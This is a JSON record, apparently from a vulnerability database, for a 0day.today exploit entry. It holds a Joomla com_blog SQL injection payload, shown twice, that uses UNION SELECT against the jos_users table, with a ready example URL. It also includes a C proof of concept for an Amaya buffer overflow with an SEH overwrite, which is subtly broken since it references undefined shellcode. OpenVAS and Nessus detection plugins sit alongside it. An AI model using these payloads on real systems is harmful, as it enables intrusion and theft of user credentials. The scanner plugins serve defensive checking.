{"published": "2010-03-11T00:00:00", "id": "1337DAY-ID-11266", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:40:33", "bulletin": {"published": "2010-03-11T00:00:00", "id": "1337DAY-ID-11266", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-19T23:40:33"}}, "hash": "4c8a2620806c14d359ccffa17bd51550680079f6fe54dbbadae9b85b56f85e77", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T23:40:33", "edition": 1, "title": "Joomla Component com_blog SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/11266", "modified": "2010-03-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/11266", "references": [], "reporter": "DevilZ TM", "sourceData": "=====================================================\r\nJoomla Component com_blog SQL Injection Vulnerability\r\n=====================================================\r\n\r\n[~]######################################### ExploiT #################################################[~]\r\n \r\n[~] Vulnerable File :\r\n \r\nhttp://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=[SQL]\r\n \r\n[~] ExploiT :\r\n \r\n-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*\r\n \r\n[~] Example :\r\n \r\nhttp://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6318429d7babdda9c7e7e59f0f7453a9", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "50fb683cb1d4ec658b2f4cd06cbb33bd", "key": "href"}, {"hash": "ed9655cbc2c4c3e94b5e0391b5000980", "key": "published"}, {"hash": "9dda481cc1ef950132da3a3f0eb1bc2c", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "dde70ef2217077c94df7ba19263efc96", "key": "reporter"}, {"hash": "ed9655cbc2c4c3e94b5e0391b5000980", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "4d8402eb0433f229f11e3977f297f8ef", "key": "sourceData"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "6062a09407e796d8fca0f7518679bb78e1a43ad3b3f6ee4f28fd804e38642dbb", "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-12297"]}, {"type": "nessus", "idList": ["ACCOUNT_JILL.NASL"]}], "modified": "2018-01-03T21:23:19"}, "vulnersScore": 9.3}, "type": "zdt", "lastseen": "2018-01-03T21:23:19", "edition": 2, "title": "Joomla Component com_blog SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/11266", "modified": "2010-03-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/11266", "references": [], "reporter": "DevilZ TM", "sourceData": "=====================================================\r\nJoomla Component com_blog SQL Injection Vulnerability\r\n=====================================================\r\n\r\n[~]######################################### ExploiT #################################################[~]\r\n \r\n[~] Vulnerable File :\r\n \r\nhttp://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=[SQL]\r\n \r\n[~] ExploiT :\r\n \r\n-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*\r\n \r\n[~] Example :\r\n \r\nhttp://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "fa6bbdfbd3c1e3f32efe2459daa1138e", "key": "href"}, {"hash": "ed9655cbc2c4c3e94b5e0391b5000980", "key": "modified"}, {"hash": "ed9655cbc2c4c3e94b5e0391b5000980", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dde70ef2217077c94df7ba19263efc96", "key": "reporter"}, {"hash": "945fdc9cb0bbd141b760aa790717308f", "key": "sourceData"}, {"hash": "afefb61df48ce0f5435863821957ed4f", "key": "sourceHref"}, {"hash": "6318429d7babdda9c7e7e59f0f7453a9", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"openvas": [{"lastseen": "2019-05-06T14:38:04", "bulletinFamily": "scanner", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS12-042.", "modified": "2019-05-03T00:00:00", "published": "2012-06-13T00:00:00", "id": "OPENVAS:1361412562310902916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902916", "title": "Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902916\");\n script_version(\"2019-05-03T12:31:27+0000\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-1515\");\n script_bugtraq_id(53856, 52820);\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 12:31:27 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 09:21:39 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49454/\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2707511\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027155\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms12-042\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary\n code with kernel-mode privileges.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 7 x64 Edition Service Pack 1 and prior\n Microsoft Windows XP x32 Edition Service Pack 3 and prior\n Microsoft Windows 2K3 x32 Edition Service Pack 2 and prior\n Microsoft Windows Server 2008 x64 Edition Service Pack 1 and prior\");\n script_tag(name:\"insight\", value:\"The flaws are due to an,\n\n - Error in the User Mode Scheduler (UMS) when handling a particular system\n request can be exploited to execute arbitrary code.\n\n - Error in incorrect protection of BIOS ROM can be exploited to execute\n arbitrary code.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Microsoft Bulletin MS12-042.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4 ,win2003:3, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nexeVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\ntoskrnl.exe\");\nif(!exeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"5.1.2600.6223\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"5.2.3790.4998\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"6.1.7600.17017\") ||\n version_in_range(version:exeVer, test_version:\"6.1.7600.20000\", test_version2:\"6.1.7600.21206\")||\n version_in_range(version:exeVer, test_version:\"6.1.7601.17000\", test_version2:\"6.1.7601.17834\")||\n version_in_range(version:exeVer, test_version:\"6.1.7601.21000\", test_version2:\"6.1.7601.21986\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-05T03:15:45", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12297", "href": "https://0day.today/exploit/description/12297", "type": "zdt", "title": "Amaya 11.3.1(dec 9 2009) remote buffer overflow (poc)", "sourceData": "=====================================================\r\nAmaya 11.3.1(dec 9 2009) remote buffer overflow (poc)\r\n=====================================================\r\n\r\n\r\n#include<stdio.h>\r\n/*Amaya 11.3.1(dec 9 2009) remote buffer overflow(poc)*/\r\n unsigned int seh=0x7C902783; ;\r\n char nseh[]=\"\\xeb\\x04\\x90\\x90\";\r\n void gen_random(char *s, const int len)\r\n { int i;\r\n static const char alphanum[] =\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\";\r\n \r\n for(i=0;i<len;i++)\r\n {\r\n s[i]=alphanum[rand()%(sizeof(alphanum)-1)];\r\n }\r\n s[len]=0;\r\n }\r\n char html[]=\"<script defer=\\\"\";\r\n char end[]=\"\\\">\";\r\n int main(){\r\n FILE*f=fopen(\"shit.html\",\"wb\");\r\n char buffer[100000];\r\n fwrite(html,1,sizeof(html)-1,f);\r\n gen_random(buffer,12996);\r\n memcpy(buffer+11266,&seh,4);\r\n memcpy(buffer+11262,seh,4);\r\n memset(buffer+11266,0x90,10);\r\n memcpy(buffer+11276,calc,strlen(calc));\r\n fwrite(buffer,1,12996,f);\r\n \r\n fwrite(end,1,sizeof(end)-1,f);\r\n fclose(f);\r\n printf(\"done\");\r\n getchar();\r\n return 0;\r\n }\r\n\r\n\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12297"}], "nessus": [{"lastseen": "2019-02-21T01:07:45", "bulletinFamily": "scanner", "description": "The account 'jill' has no password set. An attacker may use this to gain further privileges on this system.", "modified": "2018-07-25T00:00:00", "id": "ACCOUNT_JILL.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11266", "published": "2003-02-20T00:00:00", "title": "Unpassworded 'jill' Account", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"jill\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11266);\n script_version (\"1.33\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Unpassworded 'jill' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'jill' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n \n script_copyright(english:\"This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}